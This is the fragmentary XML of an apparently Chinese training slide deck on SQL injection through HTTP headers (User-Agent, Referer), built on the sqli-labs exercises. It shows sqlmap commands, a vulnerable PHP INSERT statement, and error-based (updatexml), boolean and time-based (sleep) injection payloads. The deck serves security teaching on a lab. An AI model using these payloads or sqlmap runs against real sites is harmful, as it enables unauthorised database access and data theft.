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6" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="284" r:id="rId14"/>
    <p:sldId id="285" r:id="rId15"/>
    <p:sldId id="286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头中的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注入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80210"/>
            <a:ext cx="10515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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表单注入：sqlmap.py -u "http://</a:t>
            </a:r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/sqltest/post.php" --forms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2237740"/>
            <a:ext cx="11049635" cy="4121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80210"/>
            <a:ext cx="10515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指定参数探测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注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qlmap -u http://xxx.xxx.com/Login.asp --data "n=1&amp;p=1"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65" y="2550160"/>
            <a:ext cx="11355705" cy="3137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665" y="1531620"/>
            <a:ext cx="10515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olidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指定注入位置进行注入 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在保存的文件中，对于参数的修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*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r>
              <a:rPr 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557"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="922020" y="815975"/>
            <a:ext cx="10440670" cy="3907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5113655"/>
            <a:ext cx="9055735" cy="4711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76960" y="2884170"/>
            <a:ext cx="5020310" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="50203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645977" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="464597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07606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HTTP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头中的注入介绍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4361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HTTP User-Agent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849428" y="2883853"/>
            <a:ext cx="4290695" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="429069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70649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HTTP Referer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16117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076960" y="2884170"/>
            <a:ext cx="5020310" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="50203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645977" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="464597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07606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HTTP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头中的注入介绍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4361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HTTP User-Agent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849428" y="2883853"/>
            <a:ext cx="4290695" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="429069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70649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HTTP Referer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注入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3788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852545" y="3081655"/>
            <a:ext cx="44875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头中的注入介绍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64008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在安全意识越来越重视的情况下，很多网站都在防止漏洞的发生。例如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注入中，用户提交的参数都会被代码中的某些措施进行过滤。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1415415"/>
            <a:ext cx="5727700" cy="486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3355" y="152019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过滤掉用户直接提交的参数，但是对于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头中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提交的内容很有可能就没有进行过滤。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头中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent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Referer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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dui 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" y="1428750"/>
            <a:ext cx="10440035" cy="5022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74365" y="3317875"/>
            <a:ext cx="56318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User-Agent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</a:t>
            </a:r>
            <a:b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6127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Sqli-Less 18 User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入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55" y="133921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$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";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0" y="196659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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内容：</a:t>
            </a:r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updatexml(xml_document,xpath_string,new_value):</a:t>
            </a:r>
            <a:endParaRPr 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第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文档对象名称。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第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符串。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第三个参数：替换查找到的符合条件的数据。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' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or  '1'='1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1217295"/>
            <a:ext cx="10298430" cy="5466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18765" y="3163570"/>
            <a:ext cx="64547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Referer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0" y="376555"/>
            <a:ext cx="1060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Sqli-Lab19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89852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' or '1'='1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' or (length(database())) &gt;8 or if(1=1, sleep(5), null) or '1' = '1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170" y="1925320"/>
            <a:ext cx="7947660" cy="4295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0735" y="3081655"/>
            <a:ext cx="587756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安全测试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2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演示</Application>
  <PresentationFormat>宽屏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HTTP头中的注入介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>HTTP User-Agent注入 </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>HTTP Referer注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Sqlmap安全测试</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿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136</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-11T11:39:22Z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